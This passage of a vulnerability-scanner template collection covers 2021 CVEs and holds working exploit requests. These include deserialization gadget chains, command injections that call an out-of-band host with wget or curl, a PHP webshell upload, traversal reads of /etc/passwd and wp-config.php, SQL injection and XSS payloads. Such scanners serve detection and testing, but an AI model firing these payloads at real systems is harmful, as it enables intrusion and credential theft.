\"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","Illuminate"],"condition":"and"},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-46419","info":{"name":"Telesquare TLR-2855KS6 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["PUT /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nDNT: 1\n\n{{randstr}}\n","DELETE /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nDNT: 1\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 201 && status_code_2 == 204","contains(server_1, \"lighttpd\")"],"condition":"and"}]}]},{"id":"CVE-2021-39146","info":{"name":"XStream 1.4.18 - Arbitrary Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\n      <unserializable-parents/>\n      <hashtable>\n          <default>\n            <loadFactor>0.75</loadFactor>\n            <threshold>525</threshold>\n          </default>\n          <int>700</int>\n          <int>0</int>\n      </hashtable>\n      <javax.swing.UIDefaults>\n          <default>\n            <defaultLocale>zh_CN</defaultLocale>\n            <resourceCache/>\n          </default>\n      </javax.swing.UIDefaults>\n      <javax.swing.MultiUIDefaults>\n          <default>\n            <tables>\n            <javax.swing.UIDefaults serialization='custom'>\n              <unserializable-parents/>\n              <hashtable>\n                <default>\n                  <loadFactor>0.75</loadFactor>\n                  <threshold>525</threshold>\n                </default>\n                <int>700</int>\n                <int>1</int>\n                <string>lazyValue</string>\n                <javax.swing.UIDefaults_-ProxyLazyValue>\n                  <className>javax.naming.InitialContext</className>\n                  <methodName>doLookup</methodName>\n                  <args>\n                    <string>ldap://{{interactsh-url}}/#evil</string>\n                  </args>\n                </javax.swing.UIDefaults_-ProxyLazyValue>\n              </hashtable>\n              <javax.swing.UIDefaults>\n                <default>\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\n                  <resourceCache/>\n                </default>\n              </javax.swing.UIDefaults>\n            </javax.swing.UIDefaults>\n            </tables>\n          </default>\n      </javax.swing.MultiUIDefaults>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-32819","info":{"name":"Nodejs Squirrelly - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Wget"]}]}]},{"id":"CVE-2021-36380","info":{"name":"Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi/networkDiag.cgi HTTP/1.1\nHost: {{Hostname}}\n\ncommand=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-1472","info":{"name":"Cisco Small Business RV Series - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nCookie: sessionid='`wget http://{{interactsh-url}}`'\nAuthorization: QUt6NkpTeTE6dmk4cW8=\nContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"option\"\n\n5NW9Cw1J\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"destination\"\n\nJ0I5k131j2Ku\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file.path\"\n\nEKsmqqg0\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\nContent-Type: application/xml\n\nqJ57CM9\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"filename\"\n\nJbYXJR74n.xml\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\n-----------------------------392306610282184777655655237536--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"jsonrpc\":"]}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44451","info":{"name":"Apache Superset <=1.3.2 - Default Login","severity":"medium"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&username={{username}}&password={{password}}\n","GET /dashboard/list/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["session"]},{"type":"word","part":"body_3","words":["DashboardFilterStateRestApi"]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" type=\"hidden\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy&param2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to <script>alert(document.domain)</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-41291","info":{"name":"ECOA Building Automation System - Directory Traversal Content Disclosure","severity":"high"},"requests":[{"raw":["GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              <javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://{{interactsh-url}}/test</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39312","info":{"name":"WordPress True Ranker <2.2.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nsrc=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42887","info":{"name":"TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login.htm HTTP/1.1\nHost: {{Hostname}}\n","GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["TOTOLINK"]},{"type":"word","part":"header_2","words":["Set-Cookie: SESSION_ID="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-41826","info":{"name":"PlaceOS 1.2109.1 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/logout?continue=//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301],"condition":"or"}]}]},{"id":"CVE-2021-39211","info":{"name":"GLPI 9.2/<9.5.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/telemetry.php","{{BaseURL}}/glpi/ajax/telemetry.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"uuid\":","\"glpi\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35587","info":{"name":"Oracle Access Manager - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/oam/server/opensso/sessionservice"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["x-oracle-dms-ecid","x-oracle-dms-rid"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"body","words":["/oam/pages/css/general.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img/src/onerror=alert(document.domain)>","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-30175","info":{"name":"ZEROF Web Server 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /HandleEvent HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nAjax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header","words":["ZEROF"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39152","info":{"name":"XStream <1.4.18 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs>GBK</cs>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-36356","info":{"name":"Kramer VIAware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nradioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n","GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-45232","info":{"name":"Apache APISIX Dashboard <2.10.1 - API Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/apisix/admin/migrate/export"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Consumers\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3293","info":{"name":"emlog 5.3.1 Path Disclosure","severity":"medium"},"requests":[{"raw":["GET /t/index.php?action[]=aaaa HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>Warning</b>","on line","expects parameter"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24370","info":{"name":"WordPress Fancy Product Designer <4.6.9  - Arbitrary File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"error\":\"You need to define a directory"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41282","info":{"name":"pfSense - Arbitrary File Write","severity":"high"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n","GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\nHost: {{Hostname}}\n","GET /test.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'c3959e8a43f1b39b0d1255961685a238')","status_code==200"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["(sid:[a-z0-9,;:]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-27314","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Doctor Appoinment System\")"],"condition":"and"}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(/{{randstr}}/)</script>","Sorry, no posts matched your 